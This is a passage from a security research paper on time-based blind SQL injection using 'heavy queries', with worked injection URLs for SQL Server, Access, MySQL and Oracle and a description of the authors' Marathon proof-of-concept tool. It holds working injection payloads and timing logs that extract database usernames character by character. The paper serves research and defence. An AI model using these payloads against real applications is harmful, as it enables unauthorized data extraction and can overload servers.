sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 75>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 100>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 110>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
7. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 6 of 12
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 120>(select top 1
ascii(substring(name,1,1)) from sysusers) 14 s TRUE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 115>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 118>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 119>(select top 1
ascii(substring(name,1,1)) from sysusers) 1 s FALSE
Then the result is ASCII(119)=’w’, and then we start with the second character:
http://www.informatica64.com/blind2/pista.aspx?id_pista=1 and (SELECT count(*) FROM
sysusers AS sys1, sysusers as sys2, sysusers as sys3, sysusers AS sys4, sysusers AS sys5,
sysusers AS sys6, sysusers AS sys7, sysusers AS sys8)>1 and 150>(select top 1
ascii(substring(name,1,1)) from sysusers) ¿?
This example is running with Microsoft SQL Server 2000 but it runs in the similar way in
Microsoft SQL Server 2005.
2.2 Microsoft Access 2000
Microsoft Access 2000 databases contain a little set of tables for storing information about the
objects created in them. One of these tables is MSysAccessObjects and by default all the users
connected to the database has granted access to it. This table stores some records so it is
perfect for doing a time-based Blind SQL Injection attack. The figures 5 and 6 show how to do it:
http://www.informatica64.com/retohacking/pista.aspx?id_pista=1 and (SELECT count(*) FROM
MSysAccessObjects A 20T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3,
MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,
MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS
T9,MSysAccessObjects AS T10)>0 and exists (select * from contrasena)
This example shows a heavy query for Microsoft Access 2000 databases with a delay of six
seconds. An attacker can extract all information using the same method shown in the Microsoft
SQL Server example and using this heavy query as a second condition in the “where clause” to
delay the response in the positive answers.
Figure 5: Positive Result in a Microsoft Access2000 database. The response time is 6 seconds.
8. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 7 of 12
Figure 6. egative Result in a Microsoft Access2000 database. The response time is 1 second.
2.3 MySQL 5
MySQL 5.x includes new features from prior versions including a new dictionary in the schema
called Information_Schema. In previous versions of MySQL is needed to know or to guess a
table with some records for doing an injection with a heavy query in previous versions. In this
example a Time-Based Blind SQL injection with a heavy query attack had been proved using
columns table from Information_Schema in a MySQL version 5. The results obtained are shown
in figures 7 and 8.
http://www.kachakil.com/pista.aspx?id_pista=1 and exists (select * from contrasena) and 100 >
(select count(*) from information_schema.columns, information_schema.columns T1,
information_schema T2)
Figure 7. Positive Result in a MySQL database. The response time is 30 seconds.
Figure 8. egative Result in a MySQL database. The response time is 1 second.
9. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 8 of 12
2.4 Oracle
In this example, with an Oracle Database engine, a heavy query using the view all_users from
the sys schema had been done for obtaining a time-delay. This view is granted select to all
users with Connect role. In this case, the query extracts information about the first username’s
letter of the first record in the table itself. The results are displayed in figures 9 and 10.
http://blind.elladodelmal.com/oracle/pista.aspx?id_pista=1 and (select count(*) from all_users t1, all_users
t2, all_users t3, all_users t4, all_users t5)>0 and 300>(ascii(SUBSTR((select username from all_users
where rownum = 1),1,1))
Figure 9. Positive Answer in an Oracle database. The response time is 40 seconds.
Figure 10. egative answer in an Oracle database. The response time is 1 second.
3 . HEAVY QUERIES
As these simple examples have shown, an attacker can perform a time-based blind SQL
injection exploitation just by using any heavy query. Furthermore, the attacker can use this
method with any database engine if they know (or can guess) the name of a table with recorded
data. Thus, the perimeter protection countermeasures that normally aim to create an in-depth
defense policy, such as disabling the access to stored procedures or benchmark functions,
definitely do not protect the system from these attacks. Developing secure code is the key to
avoiding these kinds of vulnerabilities.
In this paper very big heavy queries have been used just to obtain a very easy measurable
time-delay but in a real exploitation of this technique a more adjusted “heavy query” should be
used for a more optimized and quicker information extraction.
As a better exemplification we develop a tool to extract information from databases using this
method and it is explained in following section.
10. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 9 of 12
4. MARATHON TOOL
Marathon Tool is a POC about using heavy queries to perform a Time-Based Blind SQL
Injection attack. This tool is still in progress but is right now in a very good alpha version to
extract information from web applications using Microsoft SQL Server, MySQL or Oracle
Databases.
4.1. Configuration Section
In this section first of all must be configured information about the web application. This
information is in the Basic Configuration panel:
Figure 11: Marathon Tool Configuration Section. Basic Configuration Panel.
- Database Engine: Microsoft SQL Server, MySQL or Oracle Database Server. When
Microsoft SQL Server is selected, Marathon Tool will use, by default, sys.databases or
sysusers tables to construct the heavy queries. If Oracle Database is selected then the
tables used by default will be user_objects, all_objects or user_tables. If MySQL, then
the table configured by default is information_schema.columns. These tables can be
changed in the injection options.
- Target base URL: Web application to test and connection details. SSL is not supported
in this version.
- Parameters: Can be GET or POST parameters, and can be injectable parameters or
not. The application will try to find out heavy queries for all the injectable ones.
- Cookies: A list of variables and values in the cookie can be configured in this section
but this version don´t support dynamic values.
- Authentication: In this section user credentials can be setup to connect to the web
application before start the test. This version supports Basic, Digest and NTLM
authentication methods.
- Proxy: An http proxy can be setup.
- Start Injection with and End Injection with are used to configure a prefix and/or a suffix
value in the injection test.
11. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 10 of 12
Figure 12: Marathon Tool Configuration Section. Authentication Methods.
As it could be seen in Figure 13 there are several parameters that could be tuned to improve
the performance of the tool in the injection options panel:
Figure 13: Marathon Tool Configuration Section. Basic Configuration Panel.
- Min heavy query time: This parameter sets the minimal amount of time between a true
answer and a false answer. If the difference between the true response time and false
response time is lower than this value Marathon tool will keep on looking for a new
heavy query. If the tool is being tested in a local network with a very good connection
then this value can be small, either the value should be increased.
- Http request timeout: After this time the client shutdown the connection assuming this
query as a heavy query.
- Request tests count: Once the tool detect a true answer repeats the test to make sure it
is due to the heavy query and not to the any other reason.
- Pause after heavy query: After every heavy query the tool pauses this time. This is due
to the fact that a big amount of big heavy queries at the same time could result in false
positives or in a denial of service attack against the web application.
- Pause after any query: After every query, no matter if it is a heavy one or not the tool
pauses this time.
- Minimum joins for queries: This value is the initial number of tables used in query when
the tool is looking for a heavy query.
- Maximum joins for queries: If the tool hasn´t found a heavy query after construct a
query with this number of tables in join clause then the tool stops.
12. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 11 of 12
- Enable equal sign in selects: To construct the heavy query, on depends on web
application, web firewalls or databases, the tool constructs the heavy queries using
relational operators or equals operators.
- Heavy queries tables: These are the tables Marathon Tool will use to construct heavy
queries. On depend on the database engine selected the tool configures different ones,
but can be entered by user.
Once the Configuration section is ready and the injection options are configured, Marathon Tool
needs to initialize the test. In this initialization test Marathon Tool will look for a valid heavy
query in the injectable value to prove the configuration as valid. When it finished the tool can
retrieve the schema of the database or the user used in the web application to connect against
the database engine.
Figure 14: Marathon Tool Configuration Section. Basic Start Injection.
4.2. Database Schema
This section shows the information Marathon Tool has collected from the web application using
Time-Based Blind SQL Injection with heavy queries. It is not a quick method for extracting
information but in some web applications based in database engines without time-delay
functions could be the only exploitation method.
Figure 15: Marathon Tool Database Schema
4.3. Debug Log Section
This panel shows the queries throw against the web application. It has different detail levels to
see all the tests, only the positive answers or only the values Marathon Tool is collecting. This
log is a good tool to analyze the behaviour of the web application in the test and it is good for
tuning purposes.
13. Time-Based Blind SQL Injection using heavy queries & Marathon Tool
Page 12 of 12
Figure 16: Marathon Tool Debug Log Section
References
[1] “(More) Advanced SQL Injection”. Chris Anley. NGS Software URL:
http://www.nextgenss.com/papers/more_advanced_sql_injection.pdf
[2] “Blindfolded SQL Injection”. Authors: Ofer Maor y Amichai Shulman. Imperva
URL:http://www.imperva.com/application_defense_center/white_papers/blind_sql_server_injection.html
[3] “Blind SQL Injection Automation Techniques”. Author: Cameron Hotchkies. BlackHat Conferences.
URL:https://www.blackhat.com/presentations/bh-usa-04/bh-us-04-hotchkies/bh-us-04-hotchkies.pdf
[4] “Absinthe”. Author: Cameron Hotchkies. 0x90.URL: http://www.0x90.org/releases/absinthe/download.php
[5] “Data Mining with SQL Injection and Inference”. Author: David Litchfield. NGS Software. URL:
http://www.ngssoftware.com/research/papers/sqlinference.pdf ]
[6] “SQL Injection Cheat Sheet”. Author: Ronald van den Heetkamp. 0x000000. URL:
http://www.0x000000.com/?i=14&bin=1110
[7] “Solar Empire’s Exploit”. Author: Blackhawk. Milw0rm. URL: http://www.milw0rm.com/exploits/4078
[8] “…a SQL Server Injection & takeover tool… ”. Author: icesurfer. SQLNinja. URL: http://sqlninja.sourceforge.net
[9] “SQL PowerInjector”. Author: Francois Larouche. SQL PowerInjector. URL: http://www.sqlpowerinjector.com
Authors
Chema Alonso Chema Alonso is a Computer Engineer by the Rey Juan Carlos University and System Engineer by the
Politécnica University of Madrid. He has been working as security consultant last six years and had been awarded as
Microsoft Most Valuable Professional from 2005 to present time. He is a Microsoft frequent speaker in Security
Conferences. He writes monthly in several Spanish Technical Magazines as “Windows TI Magazine”, “PC Actual” or
“Hackin9”. He is currently working on his PhD thesis under the direction of Dr. Antonio Guzmán and Dr. Marta Beltran.
chema@informatica64.com
Daniel Kachakil received the degree in Systems Engineer and the Master degree on Software Engineering by the
University Politécnica of Valencia. dani@kachakil.com
Rodolfo Bordón received the degree in Software Specialist Technician and works as System Security Consultant.
rodol@informatica64.com
Antonio Guzmán received the degree in Physics Science in 1999 and Ph.D. degree in Computer Science in 2006 from
Rey Juan Carlos University of Madrid, Spain. Since 2000, he has been an Assistant Professor with the Department of
Computer Architecture and Technology, Rey Juan Carlos University. Antonio.guzman@urjc.es
Marta Beltrán received the Laurea com Laude degree in electronic engineering in 2000, from Complutense University
of Madrid, Spain and the degree in Physics Science in 2002, from UNED, Spain. She Received the Ph.D. degree in
Computer Science in 2005 form Rey Juan Carlos University of Madrid, Spain. Since 2000 to 2006 she works as
assistant professor in Rey Juan Carlos University. Since 2006 she is Titular Professor in the same university.
Marta.beltran@urjc.es